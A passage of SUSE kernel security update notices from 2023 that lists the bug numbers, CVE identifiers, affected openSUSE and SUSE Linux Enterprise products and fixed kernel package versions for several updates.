1208700, 1208741, 1208759, 1208776, 1208777, 1208784, 1208787, 1208816, 1208837, 1208843, 1208848, 1209008, 1209159, 1209188, 1209256, 1209258, 1209262, 1209291, 1209436, 1209457, 1209504 CVE References: CVE-2022-3523, CVE-2022-36280, CVE-2022-38096, CVE-2023-0045, CVE-2023-0461, CVE-2023-0597, CVE-2023-1075, CVE-2023-1076, CVE-2023-1078, CVE-2023-1095, CVE-2023-1118, CVE-2023-22995, CVE-2023-22998, CVE-2023-23000, CVE-2023-23004, CVE-2023-23559, CVE-2023-25012, CVE-2023-26545, CVE-2023-28328 Sources used: openSUSE Leap Micro 5.3 (src): kernel-default-base-5.14.21-150400.24.55.3.150400.24.22.7 openSUSE Leap 15.4 (src): kernel-obs-qa-5.14.21-150400.24.55.1, kernel-syms-5.14.21-150400.24.55.1, kernel-source-5.14.21-150400.24.55.2, kernel-default-base-5.14.21-150400.24.55.3.150400.24.22.7, kernel-obs-build-5.14.21-150400.24.55.3 SUSE Linux Enterprise Micro for Rancher 5.3 (src): kernel-default-base-5.14.21-150400.24.55.3.150400.24.22.7 SUSE Linux Enterprise Micro 5.3 (src): kernel-default-base-5.14.21-150400.24.55.3.150400.24.22.7 SUSE Linux Enterprise Micro for Rancher 5.4 (src): kernel-default-base-5.14.21-150400.24.55.3.150400.24.22.7 SUSE Linux Enterprise Micro 5.4 (src): kernel-default-base-5.14.21-150400.24.55.3.150400.24.22.7 Basesystem Module 15-SP4 (src): kernel-source-5.14.21-150400.24.55.2, kernel-default-base-5.14.21-150400.24.55.3.150400.24.22.7 Development Tools Module 15-SP4 (src): kernel-source-5.14.21-150400.24.55.2, kernel-syms-5.14.21-150400.24.55.1, kernel-obs-build-5.14.21-150400.24.55.3 SUSE Linux Enterprise Live Patching 15-SP4 (src): kernel-livepatch-SLE15-SP4_Update_10-1-150400.9.3.7 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:0796-2: An update that solves eight vulnerabilities and has 86 fixes can now be installed. Category: security (important) Bug References: 1166486, 1177529, 1203331, 1203332, 1204993, 1205544, 1206224, 1206232, 1206459, 1206640, 1206876, 1206877, 1206878, 1206880, 1206881, 1206882, 1206883, 1206884, 1206885, 1206886, 1206889, 1206894, 1207051, 1207270, 1207328, 1207588, 1207589, 1207590, 1207591, 1207592, 1207593, 1207594, 1207603, 1207605, 1207606, 1207607, 1207608, 1207609, 1207610, 1207613, 1207615, 1207617, 1207618, 1207619, 1207620, 1207621, 1207623, 1207624, 1207625, 1207626, 1207628, 1207630, 1207631, 1207632, 1207634, 1207635, 1207636, 1207638, 1207639, 1207641, 1207642, 1207643, 1207644, 1207645, 1207646, 1207647, 1207648, 1207651, 1207653, 1207770, 1207773, 1207845, 1207875, 1208149, 1208153, 1208183, 1208212, 1208290, 1208420, 1208428, 1208429, 1208449, 1208534, 1208541, 1208570, 1208607, 1208628, 1208700, 1208741, 1208759, 1208784, 1208787, 1209188, 1209436 CVE References: CVE-2022-36280, CVE-2022-38096, CVE-2023-0045, CVE-2023-0461, CVE-2023-0597, CVE-2023-22995, CVE-2023-23559, CVE-2023-26545 Sources used: openSUSE Leap Micro 5.3 (src): kernel-default-base-5.14.21-150400.24.49.3.150400.24.19.3 openSUSE Leap 15.4 (src): kernel-syms-5.14.21-150400.24.49.4, kernel-obs-qa-5.14.21-150400.24.49.2, kernel-source-5.14.21-150400.24.49.4, kernel-default-base-5.14.21-150400.24.49.3.150400.24.19.3, kernel-obs-build-5.14.21-150400.24.49.3 SUSE Linux Enterprise Micro for Rancher 5.3 (src): kernel-default-base-5.14.21-150400.24.49.3.150400.24.19.3 SUSE Linux Enterprise Micro 5.3 (src): kernel-default-base-5.14.21-150400.24.49.3.150400.24.19.3 Basesystem Module 15-SP4 (src): kernel-default-base-5.14.21-150400.24.49.3.150400.24.19.3, kernel-source-5.14.21-150400.24.49.4 Development Tools Module 15-SP4 (src): kernel-syms-5.14.21-150400.24.49.4, kernel-obs-build-5.14.21-150400.24.49.3, kernel-source-5.14.21-150400.24.49.4 SUSE Linux Enterprise Live Patching 15-SP4 (src): kernel-livepatch-SLE15-SP4_Update_9-1-150400.9.3.3 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:2809-1: An update that solves 84 vulnerabilities, contains 25 features and has 320 fixes can now be installed. Category: security (important) Bug References: 1065729, 1109158, 1142685, 1152472, 1152489, 1155798, 1160435, 1166486, 1172073, 1174777, 1177529, 1185861, 1186449, 1189998, 1189999, 1191731, 1193629, 1194869, 1195175, 1195655, 1195921, 1196058, 1197534, 1197617, 1198101, 1198400, 1198438, 1198835, 1199304, 1199701, 1200054, 1202353, 1202633, 1203039, 1203200, 1203325, 1203331, 1203332, 1203693, 1203906, 1204356, 1204363, 1204662, 1204993, 1205153, 1205191, 1205205, 1205544, 1205650, 1205756, 1205758, 1205760, 1205762, 1205803, 1205846, 1206024, 1206036, 1206056, 1206057, 1206103, 1206224, 1206232, 1206340, 1206459, 1206492, 1206493, 1206578, 1206640, 1206649, 1206824, 1206843, 1206876, 1206877, 1206878, 1206880, 1206881, 1206882, 1206883, 1206884, 1206885, 1206886, 1206887, 1206888, 1206889, 1206890, 1206891, 1206893, 1206894, 1206935, 1206992, 1207034, 1207036, 1207050, 1207051, 1207088, 1207125, 1207149, 1207158, 1207168, 1207185, 1207270, 1207315, 1207328, 1207497, 1207500, 1207501, 1207506, 1207507, 1207521, 1207553, 1207560, 1207574, 1207588, 1207589, 1207590, 1207591, 1207592, 1207593, 1207594, 1207602, 1207603, 1207605, 1207606, 1207607, 1207608, 1207609, 1207610, 1207611, 1207612, 1207613, 1207614, 1207615, 1207616, 1207617, 1207618, 1207619, 1207620, 1207621, 1207622, 1207623, 1207624, 1207625, 1207626, 1207627, 1207628, 1207629, 1207630, 1207631, 1207632, 1207633, 1207634, 1207635, 1207636, 1207637, 1207638, 1207639, 1207640, 1207641, 1207642, 1207643, 1207644, 1207645, 1207646, 1207647, 1207648, 1207649, 1207650, 1207651, 1207652, 1207653, 1207734, 1207768, 1207769, 1207770, 1207771, 1207773, 1207795, 1207827, 1207842, 1207845, 1207875, 1207878, 1207933, 1207935, 1207948, 1208050, 1208076, 1208081, 1208105, 1208107, 1208128, 1208130, 1208149, 1208153, 1208183, 1208212, 1208219, 1208290, 1208368, 1208410, 1208420, 1208428, 1208429, 1208449, 1208534, 1208541, 1208542, 1208570, 1208588, 1208598, 1208599, 1208600, 1208601, 1208602, 1208604, 1208605, 1208607, 1208619, 1208628, 1208700, 1208741, 1208758, 1208759, 1208776, 1208777, 1208784, 1208787, 1208815, 1208816, 1208829, 1208837, 1208843, 1208845, 1208848, 1208864, 1208902, 1208948, 1208976, 1209008, 1209039, 1209052, 1209092, 1209159, 1209256, 1209258, 1209262, 1209287, 1209288, 1209290, 1209291, 1209292, 1209366, 1209367, 1209436, 1209457, 1209504, 1209532, 1209556, 1209600, 1209615, 1209635, 1209636, 1209637, 1209684, 1209687, 1209693, 1209739, 1209779, 1209780, 1209788, 1209798, 1209799, 1209804, 1209805, 1209856, 1209871, 1209927, 1209980, 1209982, 1209999, 1210034, 1210050, 1210158, 1210165, 1210202, 1210203, 1210206, 1210216, 1210230, 1210294, 1210301, 1210329, 1210336, 1210337, 1210409, 1210439, 1210449, 1210450, 1210453, 1210454, 1210469, 1210498, 1210506, 1210533, 1210551, 1210629, 1210644, 1210647, 1210725, 1210741, 1210762, 1210763, 1210764, 1210765, 1210766, 1210767, 1210768, 1210769, 1210770, 1210771, 1210775, 1210783, 1210791, 1210793, 1210806, 1210816, 1210817, 1210827, 1210940, 1210943, 1210947, 1210953, 1210986, 1211025, 1211037, 1211043, 1211044, 1211089, 1211105, 1211113, 1211131, 1211205, 1211263, 1211280, 1211281, 1211299, 1211346, 1211387, 1211400, 1211410, 1211414, 1211449, 1211465, 1211519, 1211564, 1211590, 1211592, 1211593, 1211595, 1211654, 1211686, 1211687, 1211688, 1211689, 1211690, 1211691, 1211692, 1211693, 1211714, 1211794, 1211796, 1211804, 1211807, 1211808, 1211820, 1211836, 1211847, 1211852, 1211855, 1211960, 1212129, 1212154, 1212155, 1212158, 1212350, 1212405, 1212445, 1212448, 1212494, 1212495, 1212504, 1212513, 1212540, 1212556, 1212561, 1212563, 1212564, 1212584, 1212592, 1212605, 1212606, 1212619, 1212701, 1212741 CVE References: CVE-2020-24588, CVE-2022-2196, CVE-2022-3523, CVE-2022-36280, CVE-2022-38096, CVE-2022-4269, CVE-2022-45884, CVE-2022-45885, CVE-2022-45886, CVE-2022-45887, CVE-2022-45919, CVE-2022-4744, CVE-2023-0045, CVE-2023-0122, CVE-2023-0179, CVE-2023-0386, CVE-2023-0394, CVE-2023-0461, CVE-2023-0469, CVE-2023-0590, CVE-2023-0597, CVE-2023-1075, CVE-2023-1076, CVE-2023-1077, CVE-2023-1078, CVE-2023-1079, CVE-2023-1095, CVE-2023-1118, CVE-2023-1249, CVE-2023-1382, CVE-2023-1513, CVE-2023-1582, CVE-2023-1583, CVE-2023-1611, CVE-2023-1637, CVE-2023-1652, CVE-2023-1670, CVE-2023-1838, CVE-2023-1855, CVE-2023-1989, CVE-2023-1998, CVE-2023-2002, CVE-2023-21102, CVE-2023-21106, CVE-2023-2124, CVE-2023-2156, CVE-2023-2162, CVE-2023-2176, CVE-2023-2235, CVE-2023-2269, CVE-2023-22998, CVE-2023-23000, CVE-2023-23001, CVE-2023-23004, CVE-2023-23006, CVE-2023-23454, CVE-2023-23455, CVE-2023-2483, CVE-2023-25012, CVE-2023-2513, CVE-2023-26545, CVE-2023-28327, CVE-2023-28410, CVE-2023-28464, CVE-2023-28466, CVE-2023-28866, CVE-2023-3006, CVE-2023-30456, CVE-2023-30772, CVE-2023-31084, CVE-2023-3141, CVE-2023-31436, CVE-2023-3161, CVE-2023-3220, CVE-2023-32233, CVE-2023-33288, CVE-2023-3357, CVE-2023-3358, CVE-2023-33951, CVE-2023-33952, CVE-2023-35788, CVE-2023-35823, CVE-2023-35828, CVE-2023-35829 Jira References: PED-1549, PED-3210, PED-3259, PED-3692, PED-370, PED-3750, PED-3759, PED-376, PED-3931, PED-4022, PED-835, SES-1880, SLE-18375, SLE-18377, SLE-18378, SLE-18379, SLE-18383, SLE-18384, SLE-18385, SLE-18978, SLE-18992, SLE-19001, SLE-19253, SLE-19255, SLE-19556 Sources used: openSUSE Leap 15.5 (src): kernel-livepatch-SLE15-SP5-RT_Update_1-1-150500.11.5.1, kernel-syms-rt-5.14.21-150500.13.5.1, kernel-source-rt-5.14.21-150500.13.5.1 SUSE Linux Enterprise Live Patching 15-SP5 (src): kernel-livepatch-SLE15-SP5-RT_Update_1-1-150500.11.5.1 SUSE Real Time Module 15-SP5 (src): kernel-syms-rt-5.14.21-150500.13.5.1, kernel-source-rt-5.14.21-150500.13.5.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:2871-1: An update that solves 82 vulnerabilities, contains 25 features and has 390 fixes can now be installed. Category: security (important) Bug References: 1065729, 1109158, 1142685, 1152472, 1152489, 1155798, 1160435, 1166486, 1172073, 1174777, 1177529, 1186449, 1187829, 1189998, 1189999, 1191731, 1193629, 1194869, 1195175, 1195655, 1195921, 1196058, 1197534, 1197617, 1198101, 1198400, 1198438, 1198835, 1199304, 1199701, 1200054, 1202353, 1202633, 1203039, 1203200, 1203325, 1203331, 1203332, 1203693, 1203906, 1204356, 1204363, 1204662, 1204993, 1205153, 1205191, 1205205, 1205544, 1205650, 1205756, 1205758, 1205760, 1205762, 1205803, 1205846, 1206024, 1206036, 1206056, 1206057, 1206103, 1206224, 1206232, 1206340, 1206459, 1206492, 1206493, 1206552, 1206578, 1206640, 1206649, 1206677, 1206824, 1206843, 1206876, 1206877, 1206878, 1206880, 1206881, 1206882, 1206883, 1206884, 1206885, 1206886, 1206887, 1206888, 1206889, 1206890, 1206891, 1206893, 1206894, 1206935, 1206992, 1207034, 1207036, 1207050, 1207051, 1207088, 1207125, 1207149, 1207158, 1207168, 1207185, 1207270, 1207315, 1207328, 1207497, 1207500, 1207501, 1207506, 1207507, 1207521, 1207553, 1207560, 1207574, 1207588, 1207589, 1207590, 1207591, 1207592, 1207593, 1207594, 1207602, 1207603, 1207605, 1207606, 1207607, 1207608, 1207609, 1207610, 1207611, 1207612, 1207613, 1207614, 1207615, 1207616, 1207617, 1207618, 1207619, 1207620, 1207621, 1207622, 1207623, 1207624, 1207625, 1207626, 1207627, 1207628, 1207629, 1207630, 1207631, 1207632, 1207633, 1207634, 1207635, 1207636, 1207637, 1207638, 1207639, 1207640, 1207641, 1207642, 1207643, 1207644, 1207645, 1207646, 1207647, 1207648, 1207649, 1207650, 1207651, 1207652, 1207653, 1207734, 1207768, 1207769, 1207770, 1207771, 1207773, 1207795, 1207827, 1207842, 1207845, 1207875, 1207878, 1207933, 1207935, 1207948, 1208050, 1208076, 1208081, 1208105, 1208107, 1208128, 1208130, 1208149, 1208153, 1208183, 1208212, 1208219, 1208290, 1208368, 1208410, 1208420, 1208428, 1208429, 1208449, 1208534, 1208541, 1208542, 1208570, 1208588, 1208598, 1208599, 1208600, 1208601, 1208602, 1208604, 1208605, 1208607, 1208619, 1208628, 1208700, 1208741, 1208758, 1208759, 1208776, 1208777, 1208784, 1208787, 1208815, 1208816, 1208829, 1208837, 1208843, 1208845, 1208848, 1208864, 1208902, 1208948, 1208976, 1209008, 1209039, 1209052, 1209092, 1209159, 1209256, 1209258, 1209262, 1209287, 1209288, 1209290, 1209291, 1209292, 1209366, 1209367, 1209436, 1209457, 1209504, 1209532, 1209556, 1209600, 1209615, 1209635, 1209636, 1209637, 1209684, 1209687, 1209693, 1209739, 1209779, 1209780, 1209788, 1209798, 1209799, 1209804, 1209805, 1209856, 1209871, 1209927, 1209980, 1209982, 1209999, 1210034, 1210050, 1210158, 1210165, 1210202, 1210203, 1210206, 1210216, 1210230, 1210294, 1210301, 1210329, 1210335, 1210336, 1210337, 1210409, 1210439, 1210449, 1210450, 1210453, 1210454, 1210498, 1210506, 1210533, 1210551, 1210565, 1210584, 1210629, 1210644, 1210647, 1210725, 1210741, 1210762, 1210763, 1210764, 1210765, 1210766, 1210767, 1210768, 1210769, 1210770, 1210771, 1210775, 1210783, 1210791, 1210793, 1210806, 1210816, 1210817, 1210827, 1210853, 1210940, 1210943, 1210947, 1210953, 1210986, 1211014, 1211025, 1211037, 1211043, 1211044, 1211089, 1211105, 1211113, 1211131, 1211205, 1211263, 1211280, 1211281, 1211299, 1211346, 1211387, 1211400, 1211410, 1211414, 1211449, 1211465, 1211519, 1211564, 1211590, 1211592, 1211593, 1211595, 1211654, 1211686, 1211687, 1211688, 1211689, 1211690, 1211691, 1211692, 1211693, 1211714, 1211794, 1211796, 1211804, 1211807, 1211808, 1211820, 1211836, 1211847, 1211852, 1211855, 1211960, 1212051, 1212129, 1212154, 1212155, 1212158, 1212265, 1212350, 1212445, 1212448, 1212456, 1212494, 1212495, 1212504, 1212513, 1212540, 1212556, 1212561, 1212563, 1212564, 1212584, 1212592, 1212603, 1212605, 1212606, 1212619, 1212685, 1212701, 1212741, 1212835, 1212838, 1212842, 1212848, 1212861, 1212869, 1212892, 1212961, 1213010, 1213011, 1213012, 1213013, 1213014, 1213015, 1213016, 1213017, 1213018, 1213019, 1213020, 1213021, 1213024, 1213025, 1213032, 1213034, 1213035, 1213036, 1213037, 1213038, 1213039, 1213040, 1213041, 1213087, 1213088, 1213089, 1213090, 1213092, 1213093, 1213094, 1213095, 1213096, 1213098, 1213099, 1213100, 1213102, 1213103, 1213104, 1213105, 1213106, 1213107, 1213108, 1213109, 1213110, 1213111, 1213112, 1213113, 1213114, 1213116, 1213134 CVE References: CVE-2022-36280, CVE-2022-38096, CVE-2022-4269, CVE-2022-45884, CVE-2022-45885, CVE-2022-45886, CVE-2022-45887, CVE-2022-45919, CVE-2022-4744, CVE-2023-0045, CVE-2023-0122, CVE-2023-0179, CVE-2023-0394, CVE-2023-0461, CVE-2023-0469, CVE-2023-0590, CVE-2023-0597, CVE-2023-1075, CVE-2023-1076, CVE-2023-1077, CVE-2023-1079, CVE-2023-1095, CVE-2023-1118, CVE-2023-1249, CVE-2023-1382, CVE-2023-1513, CVE-2023-1582, CVE-2023-1583, CVE-2023-1611, CVE-2023-1637, CVE-2023-1652, CVE-2023-1670, CVE-2023-1829, CVE-2023-1838, CVE-2023-1855, CVE-2023-1989, CVE-2023-1998, CVE-2023-2002, CVE-2023-21102, CVE-2023-21106, CVE-2023-2124, CVE-2023-2156, CVE-2023-2162, CVE-2023-2176, CVE-2023-2235, CVE-2023-2269, CVE-2023-22998, CVE-2023-23000, CVE-2023-23001, CVE-2023-23004, CVE-2023-23006, CVE-2023-2430, CVE-2023-2483, CVE-2023-25012, CVE-2023-2513, CVE-2023-26545, CVE-2023-28327, CVE-2023-28410, CVE-2023-28464, CVE-2023-28866, CVE-2023-3006, CVE-2023-30456, CVE-2023-30772, CVE-2023-3090, CVE-2023-31084, CVE-2023-3111, CVE-2023-3141, CVE-2023-31436, CVE-2023-3161, CVE-2023-3212, CVE-2023-3220, CVE-2023-32233, CVE-2023-33288, CVE-2023-3357, CVE-2023-3358, CVE-2023-3389, CVE-2023-33951, CVE-2023-33952, CVE-2023-35788, CVE-2023-35823, CVE-2023-35828, CVE-2023-35829 Jira References: PED-1549, PED-3210, PED-3259, PED-3692, PED-370, PED-3750, PED-3759, PED-376, PED-3931, PED-4022, PED-835, SES-1880, SLE-18375, SLE-18377, SLE-18378, SLE-18379, SLE-18383, SLE-18384, SLE-18385, SLE-18978, SLE-18992, SLE-19001, SLE-19253, SLE-19255, SLE-19556 Sources used: openSUSE Leap 15.5 (src): kernel-livepatch-SLE15-SP5_Update_1-1-150500.11.7.1, kernel-syms-5.14.21-150500.55.7.1, kernel-obs-qa-5.14.21-150500.55.7.1, kernel-obs-build-5.14.21-150500.55.7.1, kernel-source-5.14.21-150500.55.7.1, kernel-default-base-5.14.21-150500.55.7.1.150500.6.2.5 Basesystem Module 15-SP5 (src): kernel-source-5.14.21-150500.55.7.1, kernel-default-base-5.14.21-150500.55.7.1.150500.6.2.5 Development Tools Module 15-SP5 (src): kernel-source-5.14.21-150500.55.7.1, kernel-syms-5.14.21-150500.55.7.1, kernel-obs-build-5.14.21-150500.55.7.1 SUSE Linux Enterprise Live Patching 15-SP5 (src): kernel-livepatch-SLE15-SP5_Update_1-1-150500.11.7.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:0774-1: An update that solves 17 vulnerabilities and has 92 security fixes can now be installed. Category: security (important) Bug References: 1166486, 1177529, 1193629, 1197534, 1198438, 1200054, 1202633, 1203331, 1203332, 1204363, 1204993, 1205544, 1206103, 1206224, 1206232, 1206459, 1206640, 1206877, 1206878, 1206880, 1206881, 1206882, 1206883, 1206884, 1206886, 1206894, 1206935, 1207036, 1207050, 1207051, 1207125, 1207270, 1207328, 1207588, 1207590, 1207591, 1207592, 1207593, 1207594, 1207603, 1207605, 1207606, 1207608, 1207609, 1207613, 1207615, 1207617, 1207618, 1207619, 1207620, 1207621, 1207623, 1207624, 1207625, 1207626, 1207630, 1207631, 1207632, 1207634, 1207635, 1207636, 1207638, 1207639, 1207640, 1207641, 1207642, 1207643, 1207644, 1207645, 1207646, 1207647, 1207648, 1207649, 1207650, 1207651, 1207652, 1207653, 1207768, 1207770, 1207771, 1207773, 1207795, 1207845, 1207875, 1208149, 1208153, 1208183, 1208212, 1208290, 1208420, 1208428, 1208429, 1208449, 1208534, 1208541, 1208542, 1208570, 1208607, 1208628, 1208700, 1208741, 1208759, 1208776, 1208784, 1208787, 1208816, 1208837, 1208843, 1209188 CVE References: CVE-2022-3523, CVE-2022-36280, CVE-2022-38096, CVE-2023-0045, CVE-2023-0122, CVE-2023-0461, CVE-2023-0590, CVE-2023-0597, CVE-2023-1118, CVE-2023-22995, CVE-2023-22998, CVE-2023-23000, CVE-2023-23004, CVE-2023-23454, CVE-2023-23455, CVE-2023-23559, CVE-2023-26545 Sources used: openSUSE Leap 15.4 (src): kernel-syms-azure-5.14.21-150400.14.37.1, kernel-source-azure-5.14.21-150400.14.37.1 Public Cloud Module 15-SP4 (src): kernel-syms-azure-5.14.21-150400.14.37.1, kernel-source-azure-5.14.21-150400.14.37.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:2646-1: An update that solves 69 vulnerabilities, contains six features and has 292 security fixes can now be installed. Category: security (important) Bug References: 1065729, 1109158, 1142685, 1152472, 1152489, 1155798, 1160435, 1166486, 1172073, 1174777, 1177529, 1186449, 1189998, 1189999, 1191731, 1193629, 1194869, 1195175, 1195655, 1195921, 1196058, 1197534, 1197617, 1198101, 1198438, 1198835, 1199304, 1200054, 1202353, 1202633, 1203039, 1203200, 1203325, 1203331, 1203332, 1203693, 1203906, 1204356, 1204662, 1204993, 1205191, 1205205, 1205544, 1205650, 1205756, 1205758, 1205760, 1205762, 1205803, 1205846, 1206024, 1206036, 1206056, 1206057, 1206103, 1206224, 1206232, 1206340, 1206459, 1206492, 1206493, 1206552, 1206578, 1206640, 1206649, 1206677, 1206824, 1206843, 1206876, 1206877, 1206878, 1206880, 1206881, 1206882, 1206883, 1206884, 1206885, 1206886, 1206887, 1206888, 1206889, 1206890, 1206891, 1206893, 1206894, 1206935, 1206992, 1207034, 1207050, 1207088, 1207149, 1207158, 1207168, 1207185, 1207270, 1207315, 1207328, 1207497, 1207500, 1207501, 1207506, 1207507, 1207521, 1207553, 1207560, 1207574, 1207588, 1207589, 1207590, 1207591, 1207592, 1207593, 1207594, 1207602, 1207603, 1207605, 1207606, 1207607, 1207608, 1207609, 1207610, 1207611, 1207612, 1207613, 1207614, 1207615, 1207616, 1207617, 1207618, 1207619, 1207620, 1207621, 1207622, 1207623, 1207624, 1207625, 1207626, 1207627, 1207628, 1207629, 1207630, 1207631, 1207632, 1207633, 1207634, 1207635, 1207636, 1207637, 1207638, 1207639, 1207640, 1207641, 1207642, 1207643, 1207644, 1207645, 1207646, 1207647, 1207648, 1207649, 1207650, 1207651, 1207652, 1207653, 1207734, 1207768, 1207769, 1207770, 1207771, 1207773, 1207795, 1207827, 1207842, 1207845, 1207875, 1207878, 1207935, 1207948, 1208050, 1208076, 1208081, 1208105, 1208107, 1208128, 1208130, 1208149, 1208153, 1208183, 1208212, 1208219, 1208290, 1208368, 1208420, 1208428, 1208429, 1208449, 1208534, 1208541, 1208542, 1208570, 1208588, 1208598, 1208599, 1208600, 1208602, 1208604, 1208605, 1208607, 1208619, 1208628, 1208700, 1208758, 1208759, 1208776, 1208777, 1208784, 1208787, 1208815, 1208816, 1208829, 1208837, 1208843, 1208845, 1208848, 1208864, 1208902, 1208948, 1208976, 1209008, 1209052, 1209092, 1209159, 1209256, 1209258, 1209262, 1209287, 1209288, 1209290, 1209292, 1209367, 1209457, 1209504, 1209532, 1209556, 1209600, 1209635, 1209636, 1209637, 1209684, 1209687, 1209693, 1209739, 1209779, 1209788, 1209798, 1209799, 1209804, 1209805, 1209856, 1209871, 1209927, 1209980, 1209982, 1209999, 1210034, 1210050, 1210158, 1210165, 1210202, 1210203, 1210206, 1210216, 1210230, 1210294, 1210301, 1210329, 1210336, 1210409, 1210439, 1210449, 1210450, 1210469, 1210498, 1210506, 1210533, 1210551, 1210629, 1210644, 1210647, 1210725, 1210741, 1210762, 1210763, 1210764, 1210765, 1210766, 1210767, 1210768, 1210769, 1210770, 1210771, 1210775, 1210783, 1210791, 1210793, 1210806, 1210816, 1210817, 1210827, 1210940, 1210943, 1210947, 1210953, 1210986, 1211025, 1211037, 1211043, 1211044, 1211089, 1211105, 1211113, 1211131, 1211140, 1211205, 1211263, 1211280, 1211281, 1211299, 1211387, 1211414, 1211449, 1211465, 1211519, 1211564, 1211590, 1211592, 1211593, 1211595, 1211654, 1211686, 1211687, 1211688, 1211689, 1211690, 1211691, 1211692, 1211693, 1211714, 1211796, 1211804, 1211807, 1211808, 1211820, 1211836, 1211847, 1211855, 1211960, 1212129, 1212154, 1212155, 1212158 CVE References: CVE-2022-2196, CVE-2022-36280, CVE-2022-38096, CVE-2022-4269, CVE-2022-45884, CVE-2022-45885, CVE-2022-45886, CVE-2022-45887, CVE-2022-45919, CVE-2022-4744, CVE-2023-0045, CVE-2023-0122, CVE-2023-0179, CVE-2023-0394, CVE-2023-0461, CVE-2023-0469, CVE-2023-0590, CVE-2023-0597, CVE-2023-1075, CVE-2023-1076, CVE-2023-1077, CVE-2023-1079, CVE-2023-1095, CVE-2023-1118, CVE-2023-1380, CVE-2023-1382, CVE-2023-1513, CVE-2023-1582, CVE-2023-1583, CVE-2023-1611, CVE-2023-1637, CVE-2023-1652, CVE-2023-1670, CVE-2023-1838, CVE-2023-1855, CVE-2023-1989, CVE-2023-1998, CVE-2023-2002, CVE-2023-21102, CVE-2023-21106, CVE-2023-2124, CVE-2023-2156, CVE-2023-2162, CVE-2023-2176, CVE-2023-2235, CVE-2023-2269, CVE-2023-22998, CVE-2023-23000, CVE-2023-23001, CVE-2023-23004, CVE-2023-23006, CVE-2023-2483, CVE-2023-25012, CVE-2023-2513, CVE-2023-26545, CVE-2023-28327, CVE-2023-28410, CVE-2023-28464, CVE-2023-3006, CVE-2023-30456, CVE-2023-30772, CVE-2023-31084, CVE-2023-3141, CVE-2023-31436, CVE-2023-3161, CVE-2023-32233, CVE-2023-33288, CVE-2023-33951, CVE-2023-33952 Jira References: PED-3210, PED-3259, PED-3692, PED-3750, PED-3759, PED-4022 Sources used: openSUSE Leap 15.5 (src): kernel-source-azure-5.14.21-150500.33.3.1, kernel-syms-azure-5.14.21-150500.33.3.1 Public Cloud Module 15-SP5 (src): kernel-source-azure-5.14.21-150500.33.3.1, kernel-syms-azure-5.14.21-150500.33.3.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
done, closing